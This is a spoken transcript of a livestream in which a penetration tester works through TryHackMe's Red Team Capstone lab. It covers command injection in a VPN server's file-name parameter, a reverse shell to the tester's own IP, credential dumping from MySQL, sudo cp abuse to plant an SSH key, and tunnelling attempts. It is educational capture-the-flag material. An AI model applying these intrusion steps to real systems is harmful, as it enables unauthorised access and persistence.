And we are live. What is up, everyone? Welcome back to the HackSmarter Twitch channel, or if you're watching this after the fact, welcome to my YouTube channel. It is an honor to have you hanging out with me this evening, or whatever time of the day it is where you are joining me from. We are going to dive right back into the Red Team Capstone Network by TryHackMe. This is day 4 of the network's release, and this is my 4th stream. So I've been streaming every single night since the release of this network, working our way through it. Just to recap, last night we were able to grab our first 3 flags. So we got like the flag for initial access, we breached AD, and we got the flag for also breaching tier 2 infrastructure, if my memory serves me correctly. I do want to give a shout out to TryHackMe. They just sent me this sweet water bottle in the mail, if you guys are able to see this okay. And TryHackMe swag for streaming. I would have done this for nothing. I thought it was just cool that I had the opportunity to jump on here with you guys, hang out, but now I have a sweet TryHackMe water bottle that I think will definitely make me a better hacker. With that all being said, let me go ahead and get OBS pulled up here. I got the Twitch chat pulled up. What up, Ranger? Good to have you back, my friend. Good to see you here. Let me share my screen. And as we are doing this, I do want to do my normal promotion of my Discord server. So if you are not part of the WorkSmarter Discord, I'm going to grab a link for it. I will drop it in the Twitch chat. Otherwise, if you are watching this on YouTube and you check the description of this video, you should see I have 2 Discord links in the video, but the one I'm talking about right now is the one for WorkSmarter. So let me go ahead and grab that link, drop it in the Twitch chat for anyone who is not already part of that community. And the reason I want to share that, guys, is tomorrow my live stream streak will be over. On Monday nights, I lead a meeting in that WorkSmarter community at this time, starting at 9 p.m. Central Time, and it's kind of a goal-setting meeting around cybersecurity and pen testing, all those kinds of things. And it's just a time to hang out. We encourage people to answer really 2 primary questions. What did you accomplish this past week, and what are your specific learning goals for this upcoming week? And we just hold one another accountable to our learning goals. I'll also just say, if you have any questions for me about pen testing or cybersecurity, I'm the one hosting that meeting. I will be there. I'll be hanging out. And the cool thing about that meeting, guys, is it's not just my talking head. It's back and forth, fully interactive, hanging out on Discord together, and usually a smaller meeting. So we have a lot of time to chat and discuss and talk shop. So if you're not part of that community, please join it. And if you do join it, there's an intro channel. Share a little bit about who you are. Tag me. I would love to be the first person to welcome you to that Discord community. But now that my commercials are over, let's dive into the hacking. And I do need to confess to you guys, I always say this because this is generally how I do it. When I approach these machines, I do not work on them ahead of time. I do not work on them before the stream. You get to watch me stumble through it on my stream. I did do it slightly different. So if you remember, let me go ahead and share my notes and share with you guys kind of where we're at. We have this VPN server, and we notice on this VPN server that it isn't validating the file name at all, that we can request our own VPN so that we don't get kicked off the VPN. I know some of you on Discord were having that issue because you were using the VPN you found and other people were using that same VPN, and only one person can be using a VPN, very realistic. But through this way, you can generate your own VPN file. But we thought, hey, this PHP file name equals and then the name doesn't seem to be validated. I wonder if we can abuse this to get some type of code execution on this VPN server. And so I was like, even in the stream, our stream last night, I was like, I need to think about this. And I said I wasn't going to do anything until I got on stream. Well, I lied. I wanted to try a few things out, and actually everything I was trying was not working. I was overthinking this process. I got to the point that I booted up my like legit pen testing machine and booted up Burp Suite Pro, ran things through Intruder, did fuzzing on it, and could not figure out. I knew this was exploitable, but I couldn't figure out the right way to exploit it. And then I asked my more senior pen tester, aka Amoeba Man, the creator of the network, and I was like, dude, I'm obviously missing something obvious. Like, do you mind just giving me a hint? Like, what should I try? What am I missing? I don't want to spend my entire stream stuck at this point. And he gave me this hint. I'll share you guys the hint that he gave me. He's like, hey, try something like test, as in generate that file, and then sleep 10, right? Make it sleep 10 seconds, see if you can make the response sleep, and if it does, that's a good way to know that you have code execution. Here's what I was missing. I was trying to do PHP wrappers and everything, but before I did that, I was doing tests like that, and then closing it out that way, and it wasn't working. I tried to do like test OVPN, and then who am I, things like that. Could not get it to work, but it was the and. I was quite literally just overthinking it. This seemed to work, at least when I tested it, but that's all I did for testing. Haven't messed with it much more, so I have not got code execution or anything. Once I got that working, I stopped, mainly because my kids were hanging out down here with me, and we watched Lion King. We had a kind of a family movie night. Don't know if you guys have seen Lion King, like the new 2019 Real Lion version. It was really cool, so if you haven't seen it, there's my plug for Lion King. Well, they did not sponsor this video. I wish they did. They'd probably make more money than my water bottle, but that's what worked for me. But let's see if it still works. Since I'm live on stream, everything's probably broken. Amoeba Man said, have to always chain commands, escape the current command, and then specify your new command. Yeah, and my issue is I was doing that, but I was doing my semicolon like that while I was doing other commands. I was trying like wget and stuff, but I didn't do the and. So to make it even more realistic, and I'll even say, guys, I do this in my real job. So I do web apps, and what Amoeba Man's saying, so I know those of you on Twitch can see the chat, but those of you on YouTube cannot. So Amoeba Man's hanging out in the chat, and he said, what is nice is that payload will work on both Linux and Windows. So it's a good way of testing anything that we see like this, even in the real world, to see if it actually works. Now, I will say what's realistic about this, about me even just bugging Amoeba Man, is even in my real job, every single week I have a one-on-one with one of the senior pen testers at Rhino Security Labs, where I'm a pen tester at. And what we spend the bulk of that one-on-one doing is I'm just like, hey, let me run you through this web app that I'm doing this assessment on, and just tell me like what obvious things am I missing, what features have I maybe not tested. And they have way more experience than me, and they'll almost immediately say like, have you tried this? Have you tried this? And it's usually a pretty fruitful discussion. So just know that if you are a pen tester, you have a team, right? You're not a lone wolf. You do have people that you can ask questions on, you get second set of eyes on, and that's really helpful. But let's go ahead and dive into things now, and let's just see if this still works. So let's get Burp Suite open so we can monitor these requests. I think we still have to log in as one of our users. I'm not going to recap everything that we've done, but like I said before, we've gotten the first 3 flags. We made a custom password list. We made our own custom rules in John the Ripper to generate that password list, and we compromised these 2 accounts. We were able to RDP into 2 machines after using our own VPNs that we generated. These work 1 and work 2, we can RDP into them. But the reason I want to compromise this VPN server is just to give us a better foothold into this. So if we look at, oh, it actually opened professional. Whoops. I meant to open community version. I don't have professional on this machine since it's just my personal machine. You can see, let me just click through this. You can see what everything looks like now. So when you start the network, you only, come on, Burp, can you stop interrupting my stream? When you start the network, you only have access to these 3 machines. These are internet facing. You have the web server, the VPN, and webmail. So we spent our first couple of streams enumerating that. What we did is we were able to use SMTP on the webmail server to do a brute force attack. We compromised 2 users. On the VPN server, we found a VPN file that was hanging out there. That VPN file gave us access to these 2 workstations. Once we compromised the creds in the webmail, I said, hey, I wonder if that works for RDP, and it did. And so that's how we got our 3 flags, because by RDPing into this, we got the initial like perimeter breach flag, we got the Active Directory breach flag since those are AD users that we had, and we got the tier 2 infrastructure breach flag since this is in the tier 2 infrastructure. So that's kind of a quick summary of where we have been, and this is day number 4. We'll see where we get from here, and I'm doing shorter streams since I'm on here like almost literally every night, guys. So we'll stream for about an hour to an hour and a half is how long we'll hang out. And then tomorrow night, I'll be leading that meeting on Discord about goal setting. So I will not be on tomorrow night, but hopefully I'll be back on Tuesday night. But let's get things loaded up here. We'll just throw this to the side and let me grab the IP for that VPN. Here it is right there. Beautiful. And we'll log in with one of our creds real quick that we got from brute forcing SMTP. So this lady right here, Laura Wood. And then password 1. Okay. And now we can see this request here. And we'll show you guys kind of what this looks like again. So if we go to repeater, we can do anyone here. So hello, Twitch. And what this is doing is it's going to create us a VPN file called hello twitch.ovpn, and it gives us access to those 2 workstations. Now, the first thing I try to do is using my AD access, I looked up what people were admins on like tier 2 infrastructure, and I tried to generate a VPN with their name in it, thinking it would give me access to more machines, but that didn't work. I thought that was a pretty clever way to attack it, but it didn't work when I tried it. And so what you need to do to exploit this, we of course need to pass it at least a name. So for example, if we try to just do the sleep 10, I don't know if I need to URL encode it. I might have to. But you're going to see it's a bad request. I'll just URL encode it to make sure that's not the reason. At least it shouldn't work. Is it actually sleeping 10? Seems like it is. Generally, you have to give it a valid argument. Oh, no. So it just generated that whole file. So it generated it attempted to generate a VPN file, but all it's doing is redirecting us because the request failed. And the reason the request failed is we did not give it something valid to do first. So before we try to do command injection, we actually have to have it generate or attempt to generate a file. We need to give it a file name parameter that's proper. So we can do like hack smarter, right? And sleep 10. And then it should generate it. Control U is how you URL encode it. It'll take 10 seconds to respond, and then it should also generate that VPN file, I believe. Nope, okay, it didn't work. But it may have actually worked. I think it did sleep 10. One way that we can test this is we have test.text. We can see if it's actually going to reach out. So if we host a quick HTTP server on here, we can, if we assume this might be a Linux box, which I'm pretty sure it is based on how things look, we could try hack smarter and wget 10.50, 110.119 test.text like that. And we can control U it just to do URL encoding. And you can see that we are getting a connection back. So that's the VPN server right there, reaching out to our box right there. So we do know that we have code execution on the VPN server. We can run commands anyways. So then the question goes, and this is where I haven't done anything more than this, is in order to get a shell, can we get an actual stable shell on the machine? And it really depends what's installed on the machine, and we don't know for sure. If it is a Linux machine, which it seems to be, it's likely Netcat is on there. So my first thing I want to try is Netcat. Otherwise, we could actually upload a shell to it and seek to run it that way as well if we wanted to. Oh, I did the wrong. I called it .text. I bet if I change this to .txt, it'll work. Oh, maybe if I hosted the web server, send, and you can see there it got our text.txt file. So we could upload a shell that way and run the shell, but we could also just try something with Netcat and see if that works. And so I should have the syntax memorized, but I always forget it slightly. And not all versions of Netcat allow you to do this. We could even upload a Netcat binary if it didn't work and do it that way. So there's two kinds of shells. We have bind shells and a reverse shell. I'm going to try a reverse shell first, but we'll see how it works. So on our listener, which is the easy one, we'll do, let's do a common port. I don't think 443 is running on that machine. Sometimes, depending on the firewall, if it's not actually checking the traffic going through, if you use a common port, you can bypass any type of firewall that might be present. And then on the victim machine, we're going to do that command right there. So we'll just type up the command. Of course, it's our IP. And so we'll do like test and netcat 10.50.110.119 443. Execute. That is what our command's going to look like. And we'll see if it works. It did not work. Make sure my syntax isn't correct, but my guess is netcat may not be on the machine, would be my guess at why that does not work that way. And we don't have any, information here that's going to be helpful for us. Because if we just change that to like, well, let's try to upload our own shell to it. So we know, I wonder if we upload a shell, if it would be in the web root, like if we could do a simple web shell. Otherwise, we could use MSF Venom to generate a shell, which might be useful. Like I said before, we can even see it's Ubuntu, so we know it's Linux that's running on the machine. Linux usually has netcat, but there's a lot of other ways that we can abuse this. So let's do the shell. We'll upload a shell, and we'll execute the shell. And we could do a very simple, like, reverse shell. Written in bash, maybe. Or we could just send this command, I'd assume. Let's try that first. So I might just specify the full path of that. And then our IP 10.50.110.119, and we'll say 443. All the rest of that looks good. Oh, I'm already listening. Beautiful. Let's give this a shot, see if we can get anywhere with this. It hung for a second, so I thought that was a promising sign, but it does not look like that's going to work for us. Right? Does not seem to be working. Network's not down, is it? Forward. Is it downloading stuff? It's just hanging. That's just hanging as well. Maybe it caught me and it kicked me off the network. 10.200.113.12. It's not expired. Can we hit the web server? What was the web server? It was 13. Oh, shoot. Oh, maybe it was just taking a little bit. Hold up. It finally responded. There we go. It was just hung up for some reason. It didn't give us a shell though or anything, did it? Let's try to resend that. Unless my command broke it momentarily. Oh, look, I got a shell. Beautiful. Not FTP, VPN. So we have our shell. Do we have Python? We do have Python, so we can stabilize our shell at least a little bit. And that's one way we can do it right there. I'll actually do this like that. And we'll do user bin Python 3. Or did we already have that? Maybe we already had that type of shell. But now we can look around at some stuff. So just doing ls, before we do any like linps, let's do some manual enumeration. There's a few things here that I see that are interesting to me. We, of course, have some upload stuff. We have VPNs. This DB Connect might have some database creds because we know that MySQL is running at least on the mail server. Okay, so we have the DB server is localhost. The password is password1. And then we even have the connection here. Connection database cannot be made. So let's go ahead and copy this and drop that into our notes. Go to Trimento here. And we have our VPN. We'll just drop the notes here. And what I should probably do is take notes of how we access this. Someone asked me on Discord if I was planning on coming up with like a report after going through all of this. And I thought, hey, maybe that would be helpful. I don't know if I will for sure, but we can at least take note of how we got access to the machine. So I'll get my full payload here. Copy that. There we go. HunterBot said, once you get a shell, do you normally let your client know, or is that something that gets said during reporting time? So in the real world, shells I don't think happen super often. Maybe in a red team engagement. I can't speak I don't want to give too much about what I actually do, because we're trying to be very careful not to give away clients on accident. But I will say, yes, if we were able to get remote code execution of any sort on a client's environment, we let the client know immediately, and so they can start working on fixing it, especially if it's like some type of unauthenticated shell, and we were able to do it just because it's a high critical thing. There's a few, like if we find a vuln that's critical, we let the client know right away and stay in communication with them just so they can get things working, right? We are hackers, but really we're security consultants. So we're there to help the client, the company, increase their security posture, right? So we're all on the same team. So we do let them know right away with anything like this if we were to get this on a real client. But we have this database now, so that's awesome. We should be able to connect to it. So we even see the connection here. So if we type that out, do we have, let's see. Okay, so we do have MySQL installed on here. So if we do MySQL VPN at localhost-p, I think we'll prompt for password, and we'll do password 1 exclamation mark. Access denied for user. So it's not passing the right user. I think it's MySQL-u VPN maybe. And now we'll try this. Otherwise, I might have to look up the syntax. Hey, I got connected. Show databases. Okay. So we have connection here, and I should just make note of that as well. If we were doing an actual report, let me see what I want to grab. I want to grab my syntax of how I connected. And this should be good. Proof that we got access. And the other thing that we would do, or at least I would do, if I was writing a report on this, anything sensitive, I would censor. So anytime there's like a password string or even a JWT that's being passed in the report for the client, I'll make sure that that's not there. I'll just like put a black box over it or whatever. So we have successful connection to the database here. We can enumerate databases. A lot of these databases come built into MySQL. The VPN database seems interesting. I don't know if anything would be there, but if we do use VPN, show tables, see what tables are here. We have users. So what if we just select everything from users? And we have some more credentials, it would appear. We have a test user. We should have tried that. But we have someone named Lisa Moore with the password of scientist2006. So we have some more credentials that we found. We'll grab this and drop this information here. And actually what I need to do is update my credential file on my Kali machine, just so I can keep all my credentials organized. So before we move on, let me go ahead and do that. Where did I do that? CD creds, right? We have Laura Wood. We'll do mousepad. Lisa Moore. Text. And Lisa.Moore. And her password is scientist2006. Beautiful. No, we don't need to save that. And I know I could save these all in one file, but I like to be able to do ls and see, like, here's all the users I have access to. There's another user that we have from SMTP. Let me just add him as well. Mousepad. Jeez, I cannot spell today. Mousepad Muhammad Ahmed.text. Just going to copy those from my notes. And this is one of the users we got, brute forcing SMTP. Okay, so now we have all of our users there, all of our creds there, just so it's a little more organized. Okay, so we have a shell on this machine. We have some creds that we found in the database. We'll enumerate a little bit later who Lisa Moore is. We have AD access, of course, on those machines, and we'll be able to find some more information about her that way. If I exit MySQL, what do we have for IP here? So we have, of course, this, which is going to be our IP here that is in some ways internet facing. I was expecting to see maybe two adapters, one that's here and one that gives us access to the internal network. Maybe this one does give us access to the internal network. This is an actual public IP, I believe, so we don't want to mess with that. It looks like a I don't know if it's EC2 or what that would be, but that is out of scope, I believe. So we don't want to touch that. Let's just see if we can ping any of the internal machines. So if we pull up this, we have the server one, things like that. Can I ping? I know the workstations won't work. Oh, they're all Windows. They probably won't work. Oh, shoot. My bad. I didn't mean to do that. But nice thing is we should be able to get a shell really quick. Maybe. Is it going to error out again the first time? I need to get better persistence. I need to look at SSH creds or elevate my privileges so I can set up like SSH creds or something. I was hoping I could use this for Chisel. We could look at Lisa Moore while we wait for our broken shell to fix. Let's see if we can get into those other machines. Actually, I need to connect a VPN first. Double VPN now. Do I have that? Nope. And we're going to connect to one of these other boxes. 10.200.113.21. I wonder if Lisa Moore's creds will work on here. Let's try them real quick. Scientist 2006, and she might just be low creds as well. Because this is, we already breached this in some ways, but this might be another way that someone could breach it. I'm looking for the dang name of the domain. There it is. So it might still just be like your standard help desk employee, like other users were. And based on the naming convention, I think it probably is. It's probably not an admin. But hey, you never know. Hey. Yeah, net users, Lisa, more domain. Oh, she's not even a help desk employee. What a scrub. She's just like a normal domain user. So really not super helpful for us. I think what we really need to do is use that VPN box to get better persistence into the internal network so we can hit these servers right here and see if we can connect to them at all. But based on the IP schema, I don't think we can, or on the VPN here. So we're going to enumerate that VPN server a little more if I can get my shell back. Try it again. It's quite literally the exact command I used. Did I kill it again? No, it's still there. No, but it's hanging now. Too many people attacking it. Code Reader said, which CTF are you doing on TryHackMe? We are doing the brand new Red Team Capstone challenge of 14 different machines, all interconnected. Maybe your PHP session expired. That's possible. That's possible. Let's try to just connect to the server itself. And let's log in as Laura Wood. Grab her creds real quick. Come on, Laura. I don't have proxy on, do I? Nope, I don't. Do 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 do. Weird. Okay. It says hanging up on that request. The cred shouldn't matter, I wouldn't think, like the user I'm using, but let's try Muhammad. Do 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 do. We did all that work to get our shell, and now I can't get my shell back. I mean, let me just try Firefox. It shouldn't matter. Let's try it in Firefox. Jeez. Maybe it's just something weird with this Chromium browser through Burp Suite. Possible. But I think we could. I don't think I have Foxy Proxy on here. We could just paste the payload into there, though, I think. I mean, I don't know why it wouldn't work. Let me grab that payload real quick. But once again, I think that's on my end. I don't think that has anything to do with the machine. We could if I change this to request vpn.php file name, does this work? Okay, cool. So we should just be able to do it in the URL bar up here. And so it was test, and it should URL encode it automatically now that it's there. And was it bin bash? Okay, I'm just going to look it up. It's right here. Yeah. .50.110.119 443. And I don't know if you need the bin bash, but I added it. Shoot. Oops. Apparently that's going to be the way I have to do it. Configure this super quick. Add. Is it just gosh dang it, what is the thing? It's like Burp Suite. That's what I was doing, wasn't it? There, that's what I was trying to do. What? Okay. All that work. Maybe there's something weird with my payload and how I'm doing it. That's very possible as well. This should grab it now. Beautiful. Grab our payload. And we'll say test. Control U that beast. And forward. Thank you. Sorry guys for the delay there, but I'm finally back into the machine. He said, you know Python is there. Why not try Python reverse shell? Yeah, I suppose I could have. I'll do Python reverse shell next time I break my connection. Shouldn't take too long for us to do that. All right. So we have some creds here. What accounts are on here? Just MySQL. I don't see any user accounts. Okay. Let's see if there's any other creds here. So we have DB Connect. We saw that. We did get connected to SQL. We have index, logout, PHP info _ test. I don't think that's going to be helpful for us. Nope. We have the request VPN.php, the reserve upload.php VPN. That's that one, right? Yeah. Oh, there's a bunch of VPNs. So that must be when people request the VPNs, they get saved to VPNs, that plural folder. Was that me? Am I the one who tried that? Or is that something legit? I should go download that. I don't remember doing that, but maybe I did. Let me actually check. Do I have that guy here somewhere? I remember messing with that. Look over the chat. Last night my VPN crashed. After that, I was a little bit hard to connect. Ooh, timeout. That should be fine. I have my VPN or my shell. Do I have a CS degree? No. I mean, I have a bachelor's in cybersecurity, but I don't have like a legit computer science degree. But I do have a cybersecurity degree and a bunch of certs, but I don't think they mean much. I don't know if that's supposed to be there or not, because it like clearly from fuzzing, which this may have been before when I was fuzzing. I just don't remember doing that specific one. Let me just turn this off now. I just want to see this. Oh. So I only see it here? We're going to cat that out. I don't think that's going to do much for us. I'm just going to call it TO, test.ovpn. Yeah, no, it's giving us access to the same machines. That must have just been from fuzzing. That's not anything that's going to help us. That's fine. At least we checked. Blaine said, have you taken any data structure and algorithm class? I think I did at some point in time. I can't help you, though. I don't remember much. Okay, yeah, I think that's all just from fuzzing, so we can ignore that. We have VPN control. We have upload.php. I don't remember seeing an upload.php. There's an upload area? No. Okay. Okay, probably nothing too interesting there. Nothing too interesting there. Nothing too interesting there. Say we just like get root on this beast. What's... VPN fix.py, a Python script. We have OpenVPN create user. That's where we can create our own user. Throwback. Ooh, SSH. Ooh, access denied because it's owned by Ubuntu and I'm www.data. If we could become Ubuntu, we could at least get SSH access and maybe go from there. All these files are owned by Ubuntu or root. We rewrite, execute, read, write, execute, read. So we could read these. I don't think the installer is going to help us, or delete user or create user, right? Like, I don't think any of this is going to be helpful. Client 1 added configurations available. So that's just showing how it's creating each one of these profiles that would appear. Enter username. So that's just showing us that. Now, we did discover there's something I want to try that probably won't work, but I think it's worth trying. We know that Ubuntu's on this box, like the Ubuntu user. I'd assume we can switch user to Ubuntu, and we found, I'm just looking over at my notes, we found that one person, creds, Elisa Moore, scientist 2006. I just want to test cred reuse on anything like that scientist 2006 cred. I can't switch over to Ubuntu, but what we can do, wasn't it, we couldn't actually SSH, we needed a key, a public key, private key pair. Must be run from a terminal. I thought if I at least stabilize my shell, I could run those things. But maybe not, because I think all this is going to do for me, import pty.spawn, bash. Like that. Okay, that at least prompts me. Beautiful. Let me switch back over to my other tools. I know you guys can't see my screen, but I'm literally just looking at my notes I just had pulled up. Scientist 2006. Authentication failure. Okay, that's fine. One other thing I want to try for card reuse is the database password, which was password 1. All right, worth trying. Would have been an easy win if there was password reuse. Let's go and just do some classic priv-esque on this beast. I have a bunch of notes on Linux priv-esque. I'm guessing sudo's not going to work because we're just www data. Oh, shoot. Okay, it does work. Never mind. All right, so we can run two things as sudo without password. The open VPN create user.sh, which makes sense, right? Because as www data, that's what we're running. I don't think that's going to be our goal, because if we look at that file, the open VPN create user.sh, open VPN create user.sh, we can read and execute it, but we cannot write to it. So we can't change that in order to priv-esque that way. But it says we can copy as sudo. Really? I mean, just as a proof of concept, if we can copy as sudo, if we do, what's something like Etsy shadow, we should be able to copy that just as a proof of concept, and then we'll priv-esque from there. So if we do cd temp, can I do sudo, was it just bin cp? Yeah. To here. Oh, I can copy it, but I can't read it, obviously. But I can copy it. So, is that in GTFO bins? I mean, I'm sure I can think of some ways myself to priv-esque if it's not. CP, here we go. So, file read, file write, sudo. If the binary is allowed to run to super user, it does not drop out of privileges and may be used to access file system, escalate, or maintain privileges. Echo data, this can be used to copy and then read or write files from a restricted file systems with elevated privileges. Hold on, look at the chat. Make sure to understand what GTFO bins does, else you can brick this host. Okay. Okay, maybe I'll do it manually as well. Because if we do file read and just get like the SSH stuff, that might be good enough for my purposes. So here's file read. This is kind of what I want to do. If we do this, right? So even if we do, let me go back to home Ubuntu, we saw that SSH file, which is probably an ID RSA. So if we do something like L file equals home Ubuntu SSH ID RSA, we save that as a variable, and then CP. Oh, I need to sudo it though. File deb. Okay, it's not in there. But we can still read everything else. What else would be in SSH? a directory. I would assume like ID RSA. Maybe I have that wrong. We could look at a few other things. Like, let's just for testing, if we do sudo bin cp home ubuntu MySQL history dev st out. Okay, so we can obviously read files because we're seeing these databases being created. This is where he created the test user. Oh, I did an extra $sign at the end of file. Well, let me just do it the way I just did it then. So let's just do, let's do it like this. Sudo bin cp home ubuntu ssh id rsa and then dev st out. Okay, did I do anything wrong there? There's a certain file you can write a single line which will provide you with root access. Oh, bin bash. We could do it there. File write. It writes data to files that may be used to do privileged writes or write files outside of restricted file system. So actually there's a couple of ways we could do this. We can modify etc password and give ourselves permission there. Otherwise, we can modify just bash itself and give like, oh, we wouldn't write to it. It would be changing permissions of it, which I don't think we can do that here, but we could write to etc password and give ourselves root permissions that way. I think that'd be one way to do it. Writes data to files may be used to do privileged writes or write files outside a restricted file system. Because bash would just be changing the permissions, and I can't do that. I wonder what part bricks the machine. I'm not going to do it, but parents, this overrides with a shell. Oh, this overrides CP itself with a shell or any other executable that is to be executed as root. Useful in cases sudo rule allows to only run CP by path. Warning, this is a destructive action. Amoeba Man, is C the one that you're talking about that bricks the machine? This can be used to copy and then read or write files from a restricted file system or with elevated privileges. So this allows us, I think we can just echo a line to etc password. It says modifying password can brick it if you do it wrong. All right. I've done this a few times. See what happens, blah, blah, blah. Manually editing a user. We want to echo a user in. But I also don't want to brick the machine. Maybe there's a better way to do this. Can we? Let's see how other... my goodness. Have other people have done this. I have a few ideas, but I don't want to break something in the process. Oh, authorized key is HunterBot. You might actually be right. That might be what I'm missing. Good call. Let's try that first before we go along our destructive path. Would it be like that? Oh no, I think it's just authorized keys. Sudo bin cp home ubuntu ssh authorized keys dev. Oh, I forgot the stupid freaking home Ubuntu. Oh, Hunter bot, dude. You win the day. Good call. Good call, my friend. We have, look, we got Amoeba Man and T Green Key. I wonder who T Green is. Beautiful. So let's grab these. And we'll drop, what box am I on? The VPN still? Yeah. So we have some SSH keys here. We have Amoeba Man's Open VPN. We have the T Green Key. And we have, did this have something on it? Oh, Ubuntu. That was the Ubuntu key. All right. All good stuff. Let's try the Ubuntu key first. I wonder if these give us access to some of those other machines. Let's try the Ubuntu key. I need to copy that full path, though. Just so it's in my notes. Oh, I do have public keys. You're right. I can't SSH and then /I, but you can use cp sudo to add your pub key. Good call. Good call. I'll even just generate one for this. My drink. It's my new TryHackMe water bottle once again. Shout out to TryHackMe for this is my paycheck. So in our red team capstone, if we just do, isn't it SSH keygen? Enter file and we should save the key. I actually want to do it. We'll do home TryHackMe red team capstone. And we'll do IDRSA. Oh, okay, let me do that again. Oh my goodness. Fine. We'll just do it the way they want me to. Now I should be able to just add this to that file, and then I think I can SSH into the box, right? For a little more persistence, possibly. Let's go back to the syntax for that. Let me pull the Twitch chat back up. Tyler sees any key and gets super excited. Heck yeah, I do. Can't contain my excitement, dude. How are we doing on time? Oh, we got some time to work with. So now what we want to do is we want to write this to the authorized keys, because I think once we do that, we'll be able to SSH into the box, I hope, as Ubuntu. So echo data, here it is. So L file, I'll actually go up here, file write, L file to write, echo data. So I don't think I can break the machine doing this, right? If the binary is allowed to run, this can be used to copy and then read or write files from restricted file system. Blah, blah. File to write. Temp. Echo data. File. I think I can just do this. So if we do something like L file equals home Ubuntu SSH. And then if we shoot, that doesn't look right. What did I do? I'll just continue with it. Oh, I freaking forgot sudo. Gosh, I'm dumb. We need to do echo our data and then pipe it over to sudo bin cp dev. I think I'll get this eventually. Okay. Maybe that worked. Now, can I try to what's the IP again? 13.12. Do I need to disable strict checking or whatever it is, or can I just go like this? Bro, I tried to turn it off. All right, can I just add it to my host then? Oh, it gives me the command in the error message. Maybe I should learn how to read. Add correct host key to get rid of this message. Offending key, SSH key gen. Oh. Okay, guys, after a little bit of work, we got that. Um, just took me longer than the average person. That's good. That's good. So we have access to Ubuntu, but I do want to record the steps that we took. So we generated our SSH key, and then this is the main command that we ran right here. I'm just gonna grab that. I'll fix my notes later, but just so we know how we did this. There's that. And now we have Ubuntu at least. Oh, and we can literally do everything. Okay. Yeah, okay. Now we have access to everything on this machine. I don't think we... Oh, do we have flags for this? Do I get a flag for this? I don't think so. I don't think there's any flags for this, but let me double check. Let me turn off my screen share so you guys don't see my current flags. No flag. I don't believe. Because this would just be like initial access, really, breaching the perimeter and stuff. So no flags for this particular one here. But we do have this. Now, can this talk to these ones? I think so. But because they're Windows, it's probably not going to. Yeah, I already have flag 1. Can always re-verify the path. Yeah, I should be good on this. I was just thinking with the priv ask if I could do anything with that. But now we have VPN file. We have some persistence built up. So that's a good starting point. We're on VPN. The question is, can we hit like these servers from this machine? Maybe Mmap's installed. Maybe it is it? Oh, it is. Beautiful. So that would be one good way to test. One thing we can do is just mmap-p, and then we'll type in like 10.200.113.31 pn. Ignore the host discovery because they're Windows, and see if it hits them. Oh, good. Beautiful. Beautiful. We do have connection to these hosts. Now, guys, we can set up Chisel, and then we can use our own machine to start going deeper into this network. And the way that we are going to do that, I don't need this anymore. I have Chisel back here somewhere. Let's just copy this whole folder. No, not cat CD. Okay, so we have Chisel and we have client. They use the same thing, I believe. It's just the switch that you use on them that makes it different. So we need to go ahead and put this on this machine. There's my thing. And we'll go to CD home. Let's make our own directory. We'll call it Tenebrae, just in case anyone else stumbles across this. Okay, beautiful. I got my own folder now. Now I feel very cool. Now, if we go back to this terminal, we just need to do sudo python3-m hbserver.80. And we have that set up, and now we're just going to grab Chisel down with wget. Okay. Taking a little bit to download. And now, if I look at my notes for this part, we have Chisel stuff here. I believe this is when I did it on Windows, but it should be the same, I'd assume, with Linux. So these are very similar. Let's just see if it works. If not, I'll have to do some Googling. But we have Chisel now. I have to do sudo. Executable now. And beautiful. We can close this web server out. And now we'll do Chisel server. And then on this, we're going to do sudo Chisel client 10.50.110.119. Do I have the wrong file? Maybe I need an older version of Chisel or a newer version of Chisel. Let's go ahead and just grab a fresh binary. What we could do is Google this message. I think we maybe just need a fresh binary. Oh, it's older? The version of the library on your Linux system is older than what's required by Chisel. So I might just need to find an older version of Chisel. And so let's grab this. When I compile something, it gets linked, uses blah, blah. You are correct, except whatever. Okay, nope, that's too complex for me. There has to be a better way to do this. Otherwise, I'm turning this Ubuntu machine into my attack box. Can't you do your own OpenVPN file to set up your own access to servers? Probably do, but I'm not quite sure how. That's honestly a pretty good idea, though. Would that work? If we go to... Because we have that create user.sh. I don't know. Maybe, but I'm not quite sure how to do it. If I can't get Chisel to work, I will, but I'm pretty sure I can get Chisel to work. I'm just going to go to like an old version of Chisel. Like, all right, probably don't need to go to 2017. The version on Ubuntu here is from 2018, so maybe if I grab like this release here, this might work for us. Grab terminal. I think we need to match it, so that won't work. Make directory old Chisel is what I'm going to call it. And if we copy home, Tyler downloads, what's it? Is this the old one I just downloaded? No, must be this one. Gunzip-d. Okay. Before I do anything else, I just want to transfer this to the box and see if it works. Okay, we'll remove that one. We have this new version of Chisel here that's a little bit older. Let's go ahead and try to grab this. Drink of water from the TryHackMe water bottle. Oh, HunterBot said, you have SSH, you can just do SSH dynamic port forward. That is true. Let me look at this. I have some notes on all of this, right? So we have some SSH local port forwarding, remote port forwarding. So we could go that route. I think I have it set up. And I know Hack the Box Academy has also some really good tips on doing this. If I can't get chisel to work, that's what we'll end up doing. Hey, I think it's going to work, though. At least the help command works. Will the rest of it work? I have no idea. Let's just see what happens. So there's chisel there. We'll do chisel server P8000 reverse. What's this crap? This is an older version of it. I think it'd be SOX 5 then. I think that's the equivalent. Server misbehaving, really? All right, chisel's out of the picture. We're not using chisel. See what people in chat are saying. Ameeman says, I'm more of a fan of MSF SOX proxy, especially since it's Linux. All right, here's what we're going to do. I don't remember if the red team pathway, well, it probably does. Let's start with TryHackMe since this is a TryHackMe stream. Otherwise, I'm going to jump over to Hack the Box Academy. They have a really good room on this, if I recall. That's just that. This isn't like, oh, there's port forwarding. I just saw it. How do they recommend doing it? We have SSH tunneling. We can do that. Local port forwarding. Port forwarding with SOCAT. Dynamic port forwarding SOX. That's what I want to do, I think. Let's get to work. Tunneling complex exploits. Okay, don't need to show you guys all those flags, but let's try this. So while single port forwarding works quite well for tasks require access to specific sockets, there are times when we might need to run. In those cases, since we don't want to rely on SSH server existing on the Windows machines in our target network, we'll normally use a SSH client to establish a reverse dynamic port forwarding with the following command. In this case, the SSH server will start a SOX proxy on port 9050 and forward any connection requested through the SSH tunnel where they are finally proxied by the SSH client. The most interesting part is that we can easily use any of our tools to the SOX proxy by using proxy chains. To do so, we first need to make sure proxy chains is configured correctly configured to point any connection to the same port used by SSH for the SOX proxy. The proxy chains configuration file can be there on your attack box. We scroll down to the end. The default port is 9050, but any port will work as long as it matches one we use when we establish the SSH tunnel. If we now want to execute any command through the proxy, we can use proxy chains. Note that some software may not work well with SOX in some circumstances and might show altered results, so your mileage may vary. So on the victim machine, is that what we're running there? It would be Ubuntu. So like sudo, we're not the tunnel user, right? I don't think I'm doing this right. 